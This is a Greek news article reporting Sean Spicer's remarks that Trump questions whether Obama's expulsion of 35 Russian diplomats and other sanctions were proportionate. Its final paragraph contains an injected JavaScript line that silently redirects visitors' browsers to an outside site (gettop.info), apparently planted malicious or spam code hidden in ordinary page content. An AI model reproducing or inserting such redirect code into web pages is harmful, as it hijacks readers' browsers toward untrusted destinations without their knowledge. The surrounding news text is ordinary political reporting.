Τραμπ για απέλαση Ρώσων διπλωματών: Δυσανάλογες οι κυρώσεις στη Ρωσία

0
3

 

Να αναιρέσει τις κυρώσεις του Ομπάμα εναντίον της Ρωσίας όταν αναλάβει τον προεδρικό θώκο φέρεται να σκέφτεται ο Ντόναλντ Τραμπ σύμφωνα με δηλώσεις του εκπροσώπου του σε τηλεοπτική συνέντευξη.

Όπως δήλωσε ο Σον Σπάισερ, ο Λευκός Οίκος ενδεχομένως να επέβαλε δυσανάλογες κυρώσεις στη Ρωσία, διατάσσοντας την απέλαση 35 Ρώσων διπλωματών, καθώς χαρακτηρίστηκαν από την Ουάσιγκτον πράκτορες των ρωσικών υπηρεσιών κατασκοπείας.

Ο Σπάισερ δήλωσε στην εκπομπή «This Week» στο τηλεοπτικό δίκτυο ABC ότι ο Τραμπ θα θέσει ερωτήματα στις υπηρεσίες κατασκοπείας των ΗΠΑ, μετά την απόφαση του προέδρου Μπαράκ Ομπάμα για το κλείσιμο δύο ρωσικών διπλωματικών αποστολών και νέες κυρώσεις σε βάρος έξι προσώπων και πέντε οντοτήτων.

«Μια από τις ερωτήσεις που έχουμε είναι γιατί κυρώσεις τέτοιου μεγέθους; Εννοώ, βλέπουμε απέλαση 35 ατόμων, κλείσιμο δύο ρωσικών διπλωματικών αποστολών και το ερώτημα που πρέπει να τεθεί είναι: Είναι αυτή η αντίδραση ανάλογη με τις πράξεις που έγιναν; Ίσως να ήταν; Ίσως και όχι, αλλά χρειάζεται να το σκεφτούμε αυτό», δήλωσε ο Σπάισερ.

Ο Τραμπ αναμένεται αυτή την εβδομάδα να ενημερωθεί από τις αμερικανικές υπηρεσίες μυστικών πληροφοριών έπειτα από την επιστροφή του στην Νέα Υόρκη σήμερα.

Το Σάββατο ο μεγιστάνας εξέφρασε και πάλι τις αμφιβολίες του αναφορικά με τις κατηγορίες των αμερικανικών υπηρεσιών πληροφοριών για ενδεχόμενη ανάμιξη της Ρωσίας στις αμερικανικές προεδρικές εκλογές

Ο Σπάισερ δήλωσε πως δεν «λήφθηκε κανένα μέτρο δημόσια» έπειτα από την κυβερνοεπίθεση της Κίνας το 2015 με την παραβίαση δεδομένων Αμερικανών κυβερνητικών υπαλλήλων. «Απολύτως κανένα μέτρο δεν λήφθηκε όταν εκλάπησαν προσωπικά δεδομένα εκατομμυρίων ανθρώπων, ανάμεσα σε αυτά πληροφορίες για διαπιστεύσεις ασφαλείας. Δεν έγινε απολύτως τίποτε. Οπότε εγείρεται ένα ερώτημα κατά πόσον αποφασίστηκαν πολιτικά αντίποινα σε αυτή την περίπτωση αντί μια διπλωματική απάντηση». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here